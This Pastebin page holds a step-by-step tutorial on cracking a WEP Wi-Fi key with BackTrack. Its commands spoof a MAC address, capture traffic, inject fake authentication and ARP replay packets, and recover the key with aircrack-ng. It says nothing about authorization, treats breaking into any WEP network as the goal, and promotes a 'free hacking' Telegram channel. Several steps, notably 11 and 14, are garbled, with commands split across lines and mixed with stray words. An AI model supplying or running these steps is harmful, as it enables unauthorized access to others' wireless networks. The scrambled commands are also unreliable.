Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey welcome
- I hope you are all well!? thank God
- This tutorial will explain that how to crack wep key using Backtrack..!!
- What is BackTrack (Kali)??
- BackTrack was a Linux distribution that focused on security aimed at digital forensics and penetration testing use.
- OK let's start!!
- Step 1:-
- First Download Backtrack
- https://www.backtrack-linux.org/
- Step 2:-
- Burn the iso image on CD and boot your laptop from CD drive
- Step 3:-
- Select the third boot option(VESA/KDE).
- Step 4:-
- Once in BT3, click the tiny black box in the lower left corner to load up a “Konsole” window.
- Step 5:-
- Type the following command
- airmon-ng
- Note down the interface name. In this example wifi0
- Step 6:-
- airmon-ng stop wifi0
- Step 7:-
- ifconfig wifi0 down
- Step 8:-
- macchanger –mac 00:11:22:33:44:66 wifi0
- Step 9:-
- airmon-ng start wifi0
- Step 10:-
- airodump-ng wifi0
- This will start populating Wifi networks. Press Ctrl + C to stop.
- Check the network with WEP encryption.
- Notedown BSSID, CH and ESSID somewhere in notepad or paper
- Note that if the same BSSID is available in the second part with STATION associated with it,
- means you some one is accessing that network and our task will be little easier.
- If not than don’t worry we will still crack it.
- Step 11:-
- airodump-ng -c (channel) -w (file name)
- Replace
- (channel) with the CH which u had already n
- (file name) with any name of your choice
- (bssid) with the BSSID which u had already note
- –bssid (bssid) wifi0
- Note it
- Leave this console as it is and start new konsole
- Step 12:-
- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
- If you don’t get Association Successful message then keep on trying until you got success.
- Step 13:-
- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
- Well if you don’t see ARP ACK and sent packets are not increasing
- or still 0 than it means no 1 is accessing that network.
- But don’t worry you go an optional step,
- Leave this console as it is and start new k
- Step 14:-
- aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
- konsole
- message than keep on trying until you get success got an optional step
- konsole
- –b (bssid) –h 00:11:22:33:44:66 wfi0
- Press y and enter
- Now you will see that ARP and ACK packets in 2nd console are increasing fast
- Keep this console as it is and start 4th console.
- Step 15:-
- aircrack-ng -b (bssid) (filename)-
- Just wait and watch…..Backtrack will do rest of the work.
- Hurray we got the key.
- Done..!!
- Thanks
- Join our telegram channel using this link
- https://t.me/Learnfreehacking0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement